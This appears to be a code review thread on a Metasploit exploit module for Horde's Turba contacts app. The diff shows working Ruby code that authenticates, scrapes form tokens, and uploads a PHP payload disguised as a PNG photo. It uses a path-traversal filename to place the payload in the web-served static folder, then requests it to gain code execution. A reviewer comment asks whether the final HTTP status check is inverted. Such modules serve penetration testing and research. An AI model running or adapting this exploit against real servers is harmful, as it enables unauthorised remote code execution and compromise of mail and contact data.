modules/exploits/multi/http/horde_turba_file_upload.rb

```diff
@@ -0,0 +1,182 @@
+      }
+    )
+
+    return res.get_cookies if res && res.code == 302
+    nil
+  end
+
+  def get_tokens(cookie)
+    res = send_request_cgi(
+      'method'      => 'GET',
+      'uri'         => normalize_uri(target_uri, 'turba', 'add.php'),
+      'cookie'      => cookie
+    )
+
+    if res && res.code == 200
+      if res.body.scan /turba\/add\.php\?source=(.+)"/
+          source_token = Regexp.last_match.to_a[1..-1].find{|x| x != "favourites" }
+
+      if res.body =~ /name="turba_form_addcontact_formToken" value="(.+)"/
+        form_token = Regexp.last_match[1]
+        return source_token, form_token, res.get_cookies
+      end
+      end
+    end
+    nil
+  end
+
+  def exploit
+    vprint_status("Authenticating using #{username}:#{password}")
+
+    cookie = horde_login(username, password)
+    fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
+    vprint_good("Authenticated to Horde.")
+
+    tokens = get_tokens(cookie)
+    fail_with(Failure::Unknown, 'Error extracting tokens.') if tokens.nil?
+    source_token, form_token, secret_cookie = tokens
+
+    vprint_good("Tokens \"#{source_token}\", \"#{form_token}\", and cookie \"#{secret_cookie}\" found.")
+
+    targets[1..-1].each do |curr_target|
+
+    if target.name =~ /Automatic/ or curr_target == target
+
+      payload_name = Rex::Text.rand_text_alpha_lower(10)
+      payload_path = File.join(curr_target[:path], "static", "#{payload_name}.php")
+      payload_path_traversal = File.join("..", payload_path)
+
+      vprint_status("Preparing payload for target #{curr_target.name}...")
+
+      data = Rex::MIME::Message.new
+      data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"object[photo][new]\"; filename=\"#{payload_name}.png\"")
+      data.add_part("turba_form_addcontact", nil, nil, 'form-data; name="formname"')
+      data.add_part(form_token, nil, nil, 'form-data; name="turba_form_addcontact_formToken"')
+      data.add_part(source_token, nil, nil, 'form-data; name="source"')
+      data.add_part(payload_path_traversal, nil, nil, 'form-data; name="object[photo][img][file]"')
+      post_data = data.to_s
+
+      vprint_status("Uploading payload to #{payload_path_traversal}")
+      res = send_request_cgi(
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri, 'turba', 'add.php'),
+        'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+        'data'      => post_data,
+        'cookie'    => cookie + ' ' + secret_cookie
+      )
+
+      fail_with(Failure::Unknown, "Unable to upload payload to #{payload_path_traversal}.") unless res && res.code == 200
+
+      payload_url = normalize_uri(target_uri, 'static', "#{payload_name}.php")
+
+      vprint_status("Executing the payload at #{payload_url}.")
+      res = send_request_cgi(
+        'uri'     => payload_url,
+        'method'  => 'GET'
+      )
+
+      if res and res.code != 200
```

Comment:
Confirming:

`if res and res.code != 200` will be true in the event that a HTTP response is received and the HTTP code is not `200`.

`else` with be true in every other instance, including receiving no reply from the server, or server error.

Was that intended? For example, is a connection failure or HTTP 500 error an expected "success" response?